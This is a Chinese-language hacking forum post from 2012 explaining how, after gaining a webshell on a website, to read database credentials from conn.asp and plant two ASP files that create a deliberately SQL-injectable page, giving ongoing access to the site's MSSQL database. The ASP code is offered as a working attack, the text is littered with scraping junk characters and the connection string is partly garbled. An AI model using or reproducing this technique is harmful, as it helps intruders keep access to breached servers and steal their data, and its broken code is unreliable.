首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:6 M$ _5 _3 D# C+ U, v7 u
ASP/Visual Basic代码
, `0 t" }0 J t7 J1 g- O( F<!--#include file="xx.asp"--> 9 b% w q& O7 L$ F
<%
# y3 m$ A- I1 L( J2 Jset rs=server.createobject("ADODB.recordset")
2 T* r- d5 [6 `id = request("id")
3 X5 _$ G# X8 p6 ^strSQL = "select * from admin where id=" & id 1 I, o/ Z& n' l: n" ?- W' s
rs.open strSQL,conn,1,3 . X! `' `; W8 L
rs.close
7 h/ w* S6 o, X7 B) K* o%>
# ]" x( d; ^5 R& o1 D- s3 U: ~把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!" f+ t2 w3 i( s# S/ c! a0 a
然后就要构造一个连接数据库的文件了,代码如下:
7 Z# K) ?6 e9 j1 C4 G: Z9 |ASP/Visual Basic代码
: p& f W- {+ y) s/ e2 }<% * O2 `; V: v# b8 N2 @
strSQLServerName = "000.000.000.000" '服务器名称或地址
3 f' f" n- l, istrSQLDBUserName = "sqlname" '数据库帐号 4 z. i ]. ^4 o
strSQLDBPassword = "sqlpass" '数据库密码
) ]" [) @& j9 q. W* ?strSQLDBName = "sqldataname" '数据库名称
- i* c9 {2 P& r' q! T9 LSet conn = Server.CreateObject("ADODB.Connection")
. x* G/ C- ?/ d+ R) _! istrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
. s' k- |4 h5 ]- F8 Q) Bconn.open strCon
1 {- |* T! N+ H% f0 s%> , q- S# i) R. t0 ^5 G* c
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功) d) W' _- g' x; ]
|
发表于 2012-9-13 17:53:08
收藏
支持
反对